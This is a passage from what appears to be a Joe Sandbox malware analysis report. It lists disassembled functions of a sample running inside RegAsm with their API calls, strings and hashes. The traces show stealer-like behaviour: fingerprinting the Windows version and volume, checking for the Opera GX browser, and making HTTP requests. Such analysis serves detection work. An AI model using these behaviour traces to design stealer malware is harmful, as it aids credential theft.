Function 00411433 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory), ref: 00411447
HeapAlloc.KERNEL32(00000000,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory,00000000,?), ref: 0041144E
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?), ref: 0041147C
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000), ref: 00411498

Strings

Windows 11, xrefs: 0041145F

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: 25477c63717db7a1119d4dbffab179fbef7423128641dff0fa244cb4c1b9eb07
Instruction ID: 6032db6ee3a41189088d5a21486405f6b76a0e1c1a4dd88e56210a4de2521e27
Opcode Fuzzy Hash: 25477c63717db7a1119d4dbffab179fbef7423128641dff0fa244cb4c1b9eb07
Instruction Fuzzy Hash: 69F06879740204FBFB105B91ED0EFEA7B7EEB46B04F101015B701D91A0D7B499949725

Function 00410938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,004109AA,0041145B,?,?,?,00415E45,00000000,?,Windows: ,00000000), ref: 0041094C
HeapAlloc.KERNEL32(00000000,?,?,?,004109AA,0041145B,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C), ref: 00410953
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,004109AA,0041145B,?,?,?,00415E45,00000000,?,Windows: ), ref: 00410971
RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,004109AA,0041145B,?,?,?,00415E45,00000000), ref: 0041098C

Strings

CurrentBuildNumber, xrefs: 00410984

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 26c4f96b02c0b30eba7a4872bec9b4dc88b748c5ffece14e5e107eeddc4036a7
Instruction ID: 1c55e8032e8fcde8d787a3542ba7420da3729f1f579881fdbb7da51fc9f910cf
Opcode Fuzzy Hash: 26c4f96b02c0b30eba7a4872bec9b4dc88b748c5ffece14e5e107eeddc4036a7
Instruction Fuzzy Hash: 19F03075240208BBEB105B91ED0FFEE7A7DEB46B04F101059F701A90A1DBB159809764

Function 00417D8E Relevance: 8.2, APIs: 5, Instructions: 695networksleepCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00417D93

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00414229: _EH_prolog.MSVCRT ref: 0041422E

Part of subcall function 004142D8: _EH_prolog.MSVCRT ref: 004142DD

Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC

Part of subcall function 00418AFD: GetProcAddress.KERNEL32(75900000,00417EFC), ref: 00418B11
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B28
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B3F
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B56
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B6D
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B84
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418B9B
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418BB2
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418BC9
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418BE0
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418BF7
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C0E
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C25
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C3C
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C53
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C6A
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C81
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418C98
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418CAF
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418CC6
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418CDD
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418CF4
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418D0B
Part of subcall function 00418AFD: GetProcAddress.KERNEL32 ref: 00418D22

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000034,00414359,004187CB,00427712,00000000,?,00000034,00000032,00414423,004125B9,?,00000040,00000064), ref: 00417FA5

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414D3A: _EH_prolog.MSVCRT ref: 00414D3F
Part of subcall function 00414D3A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414F8C

Part of subcall function 00414315: _EH_prolog.MSVCRT ref: 0041431A

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041808A
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004180A6

Part of subcall function 004112C5: _EH_prolog.MSVCRT ref: 004112CA
Part of subcall function 004112C5: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004112ED
Part of subcall function 004112C5: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041131F
Part of subcall function 004112C5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411362
Part of subcall function 004112C5: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00411369

Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC

Part of subcall function 00412F2F: _EH_prolog.MSVCRT ref: 00412F34
Part of subcall function 00412F2F: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,0041812A), ref: 00412F56
Part of subcall function 00412F2F: ExitProcess.KERNEL32 ref: 00412F61

Part of subcall function 0040F98A: _EH_prolog.MSVCRT ref: 0040F98F
Part of subcall function 0040F98A: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040F9D3
Part of subcall function 0040F98A: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040FA47

Part of subcall function 00405C89: _EH_prolog.MSVCRT ref: 00405C8E
Part of subcall function 00405C89: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D39
Part of subcall function 00405C89: StrCmpCA.SHLWAPI(?), ref: 00405D50

Part of subcall function 00412A1B: _EH_prolog.MSVCRT ref: 00412A20
Part of subcall function 00412A1B: strtok_s.MSVCRT ref: 00412A47
Part of subcall function 00412A1B: StrCmpCA.SHLWAPI(00000000,004276E8,?,?,?,?,00418314), ref: 00412A78
Part of subcall function 00412A1B: strtok_s.MSVCRT ref: 00412AD9

Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB

Part of subcall function 0041755C: _EH_prolog.MSVCRT ref: 00417561
Part of subcall function 0041755C: lstrcat.KERNEL32(?,?), ref: 004175B7
Part of subcall function 0041755C: lstrcat.KERNEL32(?,00000000), ref: 004175DD
Part of subcall function 0041755C: lstrcat.KERNEL32(?,?), ref: 004175FD
Part of subcall function 0041755C: lstrcat.KERNEL32(?,?), ref: 00417611
Part of subcall function 0041755C: lstrcat.KERNEL32(?), ref: 00417624
Part of subcall function 0041755C: lstrcat.KERNEL32(?,?), ref: 00417638
Part of subcall function 0041755C: lstrcat.KERNEL32(?), ref: 0041764B

Part of subcall function 00417A08: _EH_prolog.MSVCRT ref: 00417A0D
Part of subcall function 00417A08: lstrcat.KERNEL32(?,00000000), ref: 00417A4F
Part of subcall function 00417A08: lstrcat.KERNEL32(?), ref: 00417A6E

Sleep.KERNEL32(000003E8), ref: 004184EF

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSleepSystemTimeVolumeWindows
String ID:
API String ID: 1785958601-0
Opcode ID: 812b0161f35f310a22b4cd4567578c2b629b3b08ab5bfb52bf8eb0cca6779026
Instruction ID: ce621b62baef0cb68773ca13e56b2eef027082e8415d82be8283ea880ac54fd0
Opcode Fuzzy Hash: 812b0161f35f310a22b4cd4567578c2b629b3b08ab5bfb52bf8eb0cca6779026
Instruction Fuzzy Hash: 74424271D00258AADF10EBA5CD56BDEBBB8AF15304F50459EF50473281DBB81B88CBA7

Function 004024D7 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004024F0

Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1

strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
RtlAllocateHeap.NTDLL(00000000), ref: 00402517

Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D

memset.MSVCRT ref: 00402540

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
String ID:
API String ID: 3248666761-0
Opcode ID: 262f0a0191609309907e5b4b01de1bc588d47ca40b8ed49772208e87ad256609
Instruction ID: ec8f99c301dfbf3cc5ab4fe19a51cc316057f8c6932f6dfa418a0bfb0b39eaff
Opcode Fuzzy Hash: 262f0a0191609309907e5b4b01de1bc588d47ca40b8ed49772208e87ad256609
Instruction Fuzzy Hash: 82F04FB2D40218B7CB50FBA4DD5AFCA777C9F14305F0000A2BA85F2081DAB89BC48BA4

Function 0040E341 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 448COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E346

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

StrCmpCA.SHLWAPI(00000000,Opera GX,00426C73,00426C72,?,?,?), ref: 0040E390

Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040B528: _EH_prolog.MSVCRT ref: 0040B52D

Strings

Opera GX, xrefs: 0040E378
#, xrefs: 0040E855

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: #$Opera GX
API String ID: 2625060131-1046280356
Opcode ID: c7c1bf0e04439b128e286dc62e7a6a89c76d931de01ac3b26dc80a4d7c88cac0
Instruction ID: 5b8b3d9e978eaf9c242c14ddf40b97072724c5bcb0dab3c085722a54aebe5a84
Opcode Fuzzy Hash: c7c1bf0e04439b128e286dc62e7a6a89c76d931de01ac3b26dc80a4d7c88cac0
Instruction Fuzzy Hash: 4B029371D0524CEADF05EBE5D946ADEBBB8AF15304F10415EF405632C2DBB82788CBA6

Function 1B68FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 1B68FE03

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 1B68FE78
winRead, xrefs: 1B68FE3D

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: 5a349499d5d2d4d96555a781347e8b9b51391e60267d3890c376cfd081117e81
Instruction ID: 70ad568d2676e74c34e99a295684cbcede5b54dea66a9a359391d3bef8185339
Opcode Fuzzy Hash: 5a349499d5d2d4d96555a781347e8b9b51391e60267d3890c376cfd081117e81
Instruction Fuzzy Hash: E34113B2A06345ABC704EF64CD819EBB7E9FF94610F84092DF744C7240E771E9188BA2

Function 00414052 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414057
lstrlenA.KERNEL32(00000000), ref: 00414074
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414138

Strings

ERROR, xrefs: 00414132

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen
String ID: ERROR
API String ID: 2133942097-2861137601
Opcode ID: e3862efabba6fd3aa4cb9b0dfabe18203077d688197a51beacfc05973109fac0
Instruction ID: 09d7b8649eec1aba69f550ff712d81861b05611d9dfb7d22293232c2b9b15471
Opcode Fuzzy Hash: e3862efabba6fd3aa4cb9b0dfabe18203077d688197a51beacfc05973109fac0
Instruction Fuzzy Hash: 81319271900248AFDB00EFB9D946BDD7FB4AF15348F10805EF505A7292DB789AC8CBA5

Function 00413DAA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00413DAF

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413E0D

Strings

ERROR, xrefs: 00413DFB
ERROR, xrefs: 00413E35

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 1120091252-2579291623
Opcode ID: 03178ecd0bbec6affdaebb525db545611335bf35cc31f130a7744cc9edddcb0a
Instruction ID: 925112e8e41893d263a36a0715b695f32bbcd4bc231054056fb3929ceaa78f2b
Opcode Fuzzy Hash: 03178ecd0bbec6affdaebb525db545611335bf35cc31f130a7744cc9edddcb0a
Instruction Fuzzy Hash: 8F216874900289EEDB04FFB5C6567DD7BB4AF14308F50414EE855A32C2DBB85B88CBA6

Function 00411DE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,`]A), ref: 00411E01
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411E1C
CloseHandle.KERNEL32(00000000), ref: 00411E23

Strings

`]A, xrefs: 00411DF7

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: `]A
API String ID: 3183270410-3109568557
Opcode ID: 873addd8e11ebcb9b6fa5a143eef055e3a12e3cdeb96587028471bad27355f2c
Instruction ID: d3e1dd0c58b219822338ecefe3d53cfe5b76f578e3df3734baccaf80f874c1ca
Opcode Fuzzy Hash: 873addd8e11ebcb9b6fa5a143eef055e3a12e3cdeb96587028471bad27355f2c
Instruction Fuzzy Hash: BEF03079501228BBDB20AF90DC49FDA3B68AB06755F004051FB45AA190DBB4AAC48B98

Function 00415865 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041586A

Part of subcall function 0041418C: _EH_prolog.MSVCRT ref: 00414191

Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004158EE
CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
